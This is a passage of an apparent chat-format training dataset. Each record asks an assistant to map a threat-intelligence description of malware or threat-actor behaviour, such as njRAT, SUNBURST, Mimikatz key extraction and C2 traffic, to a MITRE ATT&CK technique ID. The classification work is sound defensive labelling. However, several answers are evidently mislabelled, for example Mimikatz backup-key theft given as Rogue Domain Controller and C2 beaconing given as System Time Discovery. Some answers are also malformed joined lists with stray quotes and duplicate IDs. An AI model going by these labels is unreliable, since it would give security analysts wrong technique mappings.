"T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silent Librarian has used compromised credentials to obtain unauthorized access to online accounts." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "collects information about running processes from victims." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NOKKI has downloaded a remote module for execution." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It appears to us that one organization had its entire Active Directory dumped out, making up most of the credentials we found in the data dump" }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As we discover new tools used by this group, we have consistently discovered overlapping artifacts with previously used tools and infrastructure" }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has compromised the Able Desktop installer to gain access to victim's environments." }, { "role": "assistant", "content": "T1195.002 - Compromise Software Supply Chain" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "njRAT can be configured to spread via removable drives." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used compromised credentials to access other systems on a victim network." }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SHA256 Compiled C2 account POP3S Account SMTPS Accounts 861b6bc1f9." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Blue Mockingbird has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 will identify Microsoft Office documents on the victim's computer." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If an attacker has domain admin permissions, he can steal the DC backup key and as a result, decrypt all the domain users’ master keys. The Mimikatz module allowing to extract the domain backup key is lsadump::backupkeys. This module first calls the API functions LsaOpenPolicy with POLICY_GET_PRIVATE_INFORMATION as the DesiredAccess argument, so it will be able to call the function LsaRetrievePrivateData after-" }, { "role": "assistant", "content": "T1207 - Rogue Domain Controller" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gazer can execute a task to download a file." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Basic system enumeration – The script collects the Windows OS version, computer name, and the contents of a file Ni.txt in $APPDATA path; the file is presumably created and filled by different modules that will be downloaded by the main module" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Misdat has created registry keys for persistence, including `HKCU\\Software\\dnimtsoleht\\StubPath`, `HKCU\\Software\\snimtsOleht\\StubPath`, `HKCU\\Software\\Backtsaleht\\StubPath`, `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed. Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`." }, { "role": "assistant", "content": "T1547 - Boot or Logon Autostart Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Nomadic Octopus attempted to make Octopus appear as a Telegram Messenger with a Russian interface." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to open a remote shell and run basic commands." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It should be noted that the Win32/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents. It has a long list of file extensions that it tries to overwrite and delete. The complete list contains more than 4000 file extensions" }, { "role": "assistant", "content": "T1485 - Data Destruction" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This INI file is parsed to determine what Comnie should do. Comnie allows the attacker to provide and subsequently execute a batch script (BAT), executable file (EXE), or dynamic-link library (DLL). Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information" }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several BRONZE BUTLER tools encode data with base64 when posting it to a C2 server." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot identifies processes and collects the process ids." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites." }, { "role": "assistant", "content": "T1598.003 - Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dedicated methods resolve additional strings and API calls at runtime, rendering the PE even more difficult to analyze. Below is an example of the method responsible for resolving the .bazar domains. It loads an obfuscated string, and deobfuscates it using the first character of the domain name as a XOR key for the rest of the string" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to edit the Registry on the victim’s machine." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain a process list from the victim." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Zebrocy has a command to delete files and directories." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed has automatically collected data from USB drives, keystrokes, and screen images before exfiltration." }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LoudMiner used SCP to update the miner from the C2." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry will attempt to determine the local network segment it is a part of." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We discovered that TeamTNT gained initial access with the Hildegard malware by executing commands on kubelets that allow anonymous access. This was achieved by accessing the kubelet’s run command API and executing commands on running containers" }, { "role": "assistant", "content": "T1133 - External Remote Services', 'T1609 - Kubernetes Exec Into Container', 'T1609 - Kubernetes Exec Into Container" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLEAD can harvest saved credentials from browsers such as Google Chrome, Microsoft Internet Explorer, and Mozilla Firefox." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Higaisa used Base64 encoded compressed payloads." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used VBScript to gather information about a victim machine." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When one PlugX succeeds to infect a host, it then accesses to every IP address in the local network one-by-one and communicate with any connectable nodes, using one of the following protocols listed in Table 2" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery', 'T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At periodic offsets, the bootloader overwrites sectors of an infected host’s entire hard drive, with a message similar to the ransom note, padded with additional bytes (Figure 2" }, { "role": "assistant", "content": "T1561.001 - Disk Content Wipe" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates a backdoor through which remote attackers can upload files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer', 'T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ccf32 has used `cmd.exe` for archiving data and deleting files." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anchor has obfuscated code with stack strings and string encryption." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Leviathan has obfuscated code using base64 and gzip compression." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This new version of SolidBit ransomware is a .NET compiled binary (Figure 7). After opening Runtime64.exe using the debugger and .NET assembly editor DnSpy, we found that this file was obfuscated" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Action RAT has the ability to collect the hostname, OS version, and OS architecture of an infected host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A technical relevant fact about this campaign is the use of Python embedded into Windows executables of the malware. There is no multi-platform support as the code is heavily Windows-oriented (use of libraries). However, we discovered several clues that the attackers prepared the infrastructure for Mac OS X and Unix victims as well. In addition to Windows components, we also found a mobile (Android) component" }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DEATHRANSOM is written in C while the other two families are written in C++. DEATHRANSOM uses a distinct series of do/while loops to enumerate through network resources, logical drives, and directories" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 used account credentials they obtained to attempt access to Group Managed Service Account (gMSA) passwords." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can collect data from a local system." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After an initial dormant period of up to two weeks, it retrieves and executes commands, called “Jobs”, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. TEARDROP and BEACON Malware Used . Multiple SUNBURST samples have been recovered, delivering different payloads. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. The credentials used for lateral movement were always different from those used for remote access. Detection Opportunity . Organizations can use HX’s LogonTracker module to graph all logon activity and analyze systems displaying a one-to-many relationship between source systems and accounts. After an initial dormant period of up to two weeks, it retrieves and executes commands, called “Jobs”, that include the ability to transfer and execute files, profile the system, and disable system services. The userID is encoded via a custom XOR scheme after the MD5 is calculated. Commands are extracted from HTTP response bodies by searching for HEX strings using the following regular expression: \"\\{[0-9a-f-]{36}\\}\"||\"[0-9a-f]{32}\"||\"[0-9a-f]{16}\". Command data is spread across multiple strings that are disguised as GUID and HEX strings. The extracted message is single-byte XOR decoded using the first byte of the message, and this is then DEFLATE decompressed" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk." }, { "role": "assistant", "content": "T1027.001 - Obfuscated Files or Information: Binary Padding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "S-Type may create the file \"%HOMEPATH%\\Start Menu\\Programs\\Startup\\Realtek {Unique Identifier}.lnk\", which points to the malicious `msdtc.exe` file already created in the `%CommonFiles%` directory." }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can execute PowerShell scripts." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Here’s a python code to decode" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Campaign Code and Compile Time Correlation In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FunnyDream can upload files from victims' machines." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, various implants used batch scripting and `cmd.exe` for execution." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak can use the Registry for code updates and to collect credentials." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has subset groups like Bluenoroff who have used cryptocurrency mining software on victim machines." }, { "role": "assistant", "content": "T1496 - Resource Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN10 has moved laterally using the Local Administrator account." }, { "role": "assistant", "content": "T1078.003 - Valid Accounts: Local Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Axiom has used digital certificates to deliver malware." }, { "role": "assistant", "content": "T1553 - Subvert Trust Controls" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Fox Kitten has searched network shares to access sensitive documents." }, { "role": "assistant", "content": "T1039 - Data from Network Shared Drive" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "InvisiMole can disconnect previously connected remote drives." }, { "role": "assistant", "content": "T1070.005 - Indicator Removal on Host: Network Share Connection Removal" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs." }, { "role": "assistant", "content": "T1090.003 - Proxy: Multi-hop Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This command will automatically set the DNS type to use for actual C2 $showconfig Uploads the current configuration of the payload to the C2 slpx:\\d+ Sets the sleep interval between outbound DNS requests $fileUpload Downloads contents from the C2 server and writes them to a specified file Table 3 Commands available to payload Campaign Analysis The following domains are configured within the payload to be used as C2s" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Olympic Destroyer will attempt to clear the System and Security event logs using \"wevtutil\"." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The purpose is to download and execute an additional payload hosted on a compromised website: NavRAT" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BabyShark has executed the \"whoami\" command." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MoonWind can execute commands via an interactive command shell. MoonWind uses batch scripts for various purposes, including to restart and uninstall itself." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman can delete shadow volumes using \"vssadmin.exe\"." }, { "role": "assistant", "content": "T1490 - Inhibit System Recovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used malware obtained after compromising other threat actors, such as OilRig." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT28 has used compromised email accounts to send credential phishing emails." }, { "role": "assistant", "content": "T1586.002 - Email Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In our case study, approximately two minutes after Cobalt Strike activity started, a tool to enumerate an AD environment appeared on the infected host at C:\\ProgramData\\AdFind.exe." }, { "role": "assistant", "content": "T1588.002 - Tool', 'T1595 - Active Scanning" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has staged stolen data locally on compromised hosts." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Drovorub can use kernel modules to establish persistence." }, { "role": "assistant", "content": "T1547.006 - Boot or Logon Autostart Execution: Kernel Modules and Extensions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbon has a command to inject code into a process." }, { "role": "assistant", "content": "T1055.001 - Process Injection: Dynamic-link Library Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GreyEnergy enumerates all Windows services." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When the trojan starts up it will attempt to install a scheduled task with the name of “Java Maintenance64” to keep itself running." }, { "role": "assistant", "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As part of its initialization, the implant gathers basic system information and sends it to its hardcoded control server 203.131.222.83 using SSL over port 443" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used cmd.exe to execute commmands." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has used masscan to search for open Docker API ports and Kubernetes clusters. TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The CALENDAR malware communicates through the use of events in Google Calendar." }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 used Kerberos ticket attacks for lateral movement." }, { "role": "assistant", "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: 